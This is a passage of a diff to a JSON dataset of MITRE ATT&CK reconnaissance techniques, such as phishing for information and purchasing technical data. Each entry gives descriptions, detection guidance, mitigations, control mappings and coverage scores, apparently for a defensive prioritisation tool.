+        "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1597/001",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1597",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1597.002",
+        "name": "Search Closed Sources: Purchase Technical Data",
+        "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+        "url": "https://attack.mitre.org/techniques/T1597/002",
         "tactics": [
             "Reconnaissance"
         ],
@@ -19349,749 +42124,1149 @@
             "PRE"
         ],
         "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1597",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1598",
+        "name": "Phishing for Information",
+        "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
+        "url": "https://attack.mitre.org/techniques/T1598",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nWhen it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.\n\nMonitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1591.001",
-                "name": "Gather Victim Org Information: Determine Physical Locations",
-                "url": "https://attack.mitre.org/techniques/T1591/001",
-                "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "tid": "T1598.001",
+                "name": "Phishing for Information: Spearphishing Service",
+                "url": "https://attack.mitre.org/techniques/T1598/001",
+                "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+                "detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
                     }
                 ]
             },
             {
-                "tid": "T1591.002",
-                "name": "Gather Victim Org Information: Business Relationships",
-                "url": "https://attack.mitre.org/techniques/T1591/002",
-                "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "tid": "T1598.002",
+                "name": "Phishing for Information: Spearphishing Attachment",
+                "url": "https://attack.mitre.org/techniques/T1598/002",
+                "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+                "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)",
                 "mitigations": [
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
                     }
                 ]
             },
             {
-                "tid": "T1591.003",
-                "name": "Gather Victim Org Information: Identify Business Tempo",
-                "url": "https://attack.mitre.org/techniques/T1591/003",
-                "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "tid": "T1598.003",
+                "name": "Phishing for Information: Spearphishing Link",
+                "url": "https://attack.mitre.org/techniques/T1598/003",
+                "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+                "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.",
                 "mitigations": [
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
                     }
                 ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             },
             {
-                "tid": "T1591.004",
-                "name": "Gather Victim Org Information: Identify Roles",
-                "url": "https://attack.mitre.org/techniques/T1591/004",
-                "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.18333333333333335,
+        "adjusted_score": 0.18333333333333335,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SC-20",
+            "SC-44",
+            "SC-7",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.13333333333333333,
+            "mitigation_score": 0.2545454545454545
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1598.001",
+        "name": "Phishing for Information: Spearphishing Service",
+        "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+        "url": "https://attack.mitre.org/techniques/T1598/001",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1598",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
+        "cumulative_score": 0.14523809523809525,
+        "adjusted_score": 0.14523809523809525,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "SC-44",
+            "SC-7",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1598.002",
+        "name": "Phishing for Information: Spearphishing Attachment",
+        "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+        "url": "https://attack.mitre.org/techniques/T1598/002",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1598",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1056",
-                "name": "Pre-compromise",
-                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1056"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.05,
-        "adjusted_score": 0.05,
+        "cumulative_score": 0.18333333333333335,
+        "adjusted_score": 0.18333333333333335,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "cis_controls": [
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SC-20",
+            "SC-44",
+            "SC-7",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
         "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {},
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1592",
-        "name": "Gather Victim Host Information",
-        "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
-        "url": "https://attack.mitre.org/techniques/T1592",
+        "tid": "T1598.003",
+        "name": "Phishing for Information: Spearphishing Link",
+        "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+        "url": "https://attack.mitre.org/techniques/T1598/003",
         "tactics": [
             "Reconnaissance"
         ],
-        "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.",
         "platforms": [
             "PRE"
         ],
         "data_sources": [
-            "Internet Scan: Response Content"
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1592.001",
-                "name": "Gather Victim Host Information: Hardware",
-                "url": "https://attack.mitre.org/techniques/T1592/001",
-                "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).",
